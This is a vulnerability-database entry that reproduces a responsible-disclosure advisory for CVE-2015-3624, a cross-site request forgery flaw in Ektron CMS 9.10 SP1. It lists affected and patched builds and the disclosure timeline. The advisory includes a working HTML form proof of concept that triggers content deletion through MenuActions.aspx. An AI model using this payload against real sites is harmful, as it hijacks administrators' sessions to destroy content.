Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ektron CMS 9.10 SP1 Cross Site Request Forgery

🗓️ 31 May 2015 00:00:00Reported by Jerold HoongType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

Ektron CMS 9.10 SP1 Cross Site Request Forgery vulnerability allows remote attackers to hijack authentication for content deletio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability
16 Jun 201500:00
zdt
CNVD		Ektron Cross-Site Request Forgery Vulnerability
9 Jun 201500:00
cnvd
CVE		CVE-2015-3624
9 Jun 201514:00
cve
Cvelist		CVE-2015-3624
9 Jun 201514:00
cvelist
Exploit DB		Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery
16 Jun 201500:00
exploitdb
EUVD		EUVD-2015-3666
7 Oct 202500:30
euvd
EUVD		EUVD-2015-4447
7 Oct 202500:30
euvd
exploitpack		Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery
16 Jun 201500:00
exploitpack
NVD		CVE-2015-3624
9 Jun 201514:59
nvd
Prion		Cross site request forgery (csrf)
9 Jun 201514:59
prion
Rows per page
`# Vulnerability type: Cross-site Request Forgery   
# Vendor: http://www.ektron.com/  
# Product: Ektron Content Management System  
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)  
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)  
# CVE ID: CVE-2015-3624  
# Credit: Jerold Hoong  
  
# PROOF OF CONCEPT (CSRF)  
  
Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10  
SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication  
of content administrators for requests that could lead to the deletion of content and  
assets.  
  
<html>  
<body>  
<form action="http://127.0.0.1/Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx">  
<input type="hidden" name="action" value="delete" />  
<input type="hidden" name="contentId" value="4210" />  
<input type="hidden" name="LangType" value="1033" />  
<input type="hidden" name="folderId" value="561" />  
<input type="hidden" name="redirectBack" value="true" />  
<input type="hidden" name="menuType" value="Workarea" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
# TIMELINE  
– 07/04/2015: Vulnerability found  
– 07/04/2015: Vendor informed  
– 08/04/2015: Vendor responded and acknowledged  
- 01/05/2015: MITRE issued CVE number  
– 28/05/2015: Vendor released cumulative update for the issue  
– 31/05/2015: Public disclosure  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 May 2015 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00751
cross-site request forgeryektron content management systemremote attackersauthentication hijackcontent deletionvulnerabilityvendorpatched versioncve-2015-3624disclosuremitrecumulative update
34